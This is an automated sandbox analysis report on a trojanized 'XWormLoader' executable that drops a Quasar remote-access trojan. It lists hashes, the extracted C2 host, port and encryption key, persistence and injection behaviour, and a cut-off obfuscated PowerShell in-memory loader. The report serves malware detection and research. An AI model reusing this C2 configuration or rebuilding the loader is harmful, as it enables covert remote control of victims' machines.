Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-05-2024 17:47
Static task
static1
Behavioral task
behavioral1
Sample
XWormLoader 5.2 x64.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
XWormLoader 5.2 x64.exe
Resource
win10v2004-20240419-en
General
-
Target
XWormLoader 5.2 x64.exe
-
Size
329KB
-
MD5
893ee266eef0ca3b11bdb859839df69d
-
SHA1
1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
-
SHA256
40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
-
SHA512
694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
-
SSDEEP
6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
AqYe7s30CMq7SVM0oxKR
-
install_name
Discord.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Discord
-
subdirectory
Discord
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchost.exe family_quasar behavioral3/memory/3604-26-0x0000000000750000-0x00000000007BC000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 4652 created 3592 4652 WerFault.exe cmd.exe PID 2552 created 3592 2552 WerFault.exe cmd.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 1612 created 640 1612 powershell.EXE winlogon.exe PID 2624 created 3592 2624 svchost.exe cmd.exe PID 2624 created 3592 2624 svchost.exe cmd.exe PID 2688 created 640 2688 powershell.EXE winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 5 IoCs
Processes:
svchost.exeXWormLoader 5.2 x32.exeDiscord.exeinstall.exeinstall.exepid process 3604 svchost.exe 4492 XWormLoader 5.2 x32.exe 396 Discord.exe 2336 install.exe 4616 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 6 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77Discord.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1612 set thread context of 2356 1612 powershell.EXE dllhost.exe PID 2688 set thread context of 4872 2688 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2388 4492 WerFault.exe XWormLoader 5.2 x32.exe 3332 3592 WerFault.exe cmd.exe 3792 3592 WerFault.exe cmd.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exeSCHTASKS.exepid process 4740 schtasks.exe 1044 SCHTASKS.exe 4480 schtasks.exe 1952 SCHTASKS.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
WerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7133246C-BE95-441E-A4F9-31577D6A28C5}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 03 May 2024 17:49:32 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exeDiscord.exewmiprvse.exepid process 1612 powershell.EXE 1612 powershell.EXE 1612 powershell.EXE 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 396 Discord.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 3084 wmiprvse.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 396 Discord.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 396 Discord.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 396 Discord.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe 2356 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exeDiscord.exepowershell.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3604 svchost.exe Token: SeDebugPrivilege 396 Discord.exe Token: SeDebugPrivilege 1612 powershell.EXE Token: SeDebugPrivilege 1612 powershell.EXE Token: SeDebugPrivilege 2356 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe Token: SeManageVolumePrivilege 2664 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2664 svchost.exe Token: SeIncreaseQuotaPrivilege 2664 svchost.exe Token: SeSecurityPrivilege 2664 svchost.exe Token: SeTakeOwnershipPrivilege 2664 svchost.exe Token: SeLoadDriverPrivilege 2664 svchost.exe Token: SeSystemtimePrivilege 2664 svchost.exe Token: SeBackupPrivilege 2664 svchost.exe Token: SeRestorePrivilege 2664 svchost.exe Token: SeShutdownPrivilege 2664 svchost.exe Token: SeSystemEnvironmentPrivilege 2664 svchost.exe Token: SeUndockPrivilege 2664 svchost.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
Explorer.EXERuntimeBroker.exepid process 3340 Explorer.EXE 3884 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XWormLoader 5.2 x64.exesvchost.exeDiscord.exepowershell.EXEdllhost.exedescription pid process target process PID 1368 wrote to memory of 3604 1368 XWormLoader 5.2 x64.exe svchost.exe PID 1368 wrote to memory of 3604 1368 XWormLoader 5.2 x64.exe svchost.exe PID 1368 wrote to memory of 3604 1368 XWormLoader 5.2 x64.exe svchost.exe PID 1368 wrote to memory of 4492 1368 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 1368 wrote to memory of 4492 1368 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 1368 wrote to memory of 4492 1368 XWormLoader 5.2 x64.exe XWormLoader 5.2 x32.exe PID 3604 wrote to memory of 4480 3604 svchost.exe schtasks.exe PID 3604 wrote to memory of 4480 3604 svchost.exe schtasks.exe PID 3604 wrote to memory of 4480 3604 svchost.exe schtasks.exe PID 3604 wrote to memory of 396 3604 svchost.exe Discord.exe PID 3604 wrote to memory of 396 3604 svchost.exe Discord.exe PID 3604 wrote to memory of 396 3604 svchost.exe Discord.exe PID 3604 wrote to memory of 2336 3604 svchost.exe install.exe PID 3604 wrote to memory of 2336 3604 svchost.exe install.exe PID 3604 wrote to memory of 2336 3604 svchost.exe install.exe PID 3604 wrote to memory of 1952 3604 svchost.exe SCHTASKS.exe PID 3604 wrote to memory of 1952 3604 svchost.exe SCHTASKS.exe PID 3604 wrote to memory of 1952 3604 svchost.exe SCHTASKS.exe PID 396 wrote to memory of 4740 396 Discord.exe schtasks.exe PID 396 wrote to memory of 4740 396 Discord.exe schtasks.exe PID 396 wrote to memory of 4740 396 Discord.exe schtasks.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 1612 wrote to memory of 2356 1612 powershell.EXE dllhost.exe PID 2356 wrote to memory of 640 2356 dllhost.exe winlogon.exe PID 2356 wrote to memory of 708 2356 dllhost.exe lsass.exe PID 2356 wrote to memory of 996 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 420 2356 dllhost.exe dwm.exe PID 2356 wrote to memory of 456 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 764 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1076 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1084 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1164 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1172 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1272 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1292 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1400 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1476 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1496 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1572 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1596 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1712 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1728 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1748 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1828 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1872 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1884 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1904 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2004 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 1256 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2096 2356 dllhost.exe spoolsv.exe PID 2356 wrote to memory of 2232 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2408 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2416 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2472 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2524 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2596 2356 dllhost.exe svchost.exe PID 2356 wrote to memory of 2616 2356 dllhost.exe sysmon.exe PID 2356 wrote to memory of 2652 2356 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9edf36f4-8ff6-4cd5-b545-07bbffea0ba1}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{70442150-baf2-4258-b143-d39f18318265}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XKnSftNraHzw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQRKUtcFbwhIsT,[Parameter(Position=1)][Type]$SGlyOqrFPf)$LaJSxrnlxpL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+'r'+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$LaJSxrnlxpL.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQRKUtcFbwhIsT).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+'d');$LaJSxrnlxpL.DefineMethod('I'+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+',H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+'a'+''+'l'+'',$SGlyOqrFPf,$wQRKUtcFbwhIsT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'a'+'g'+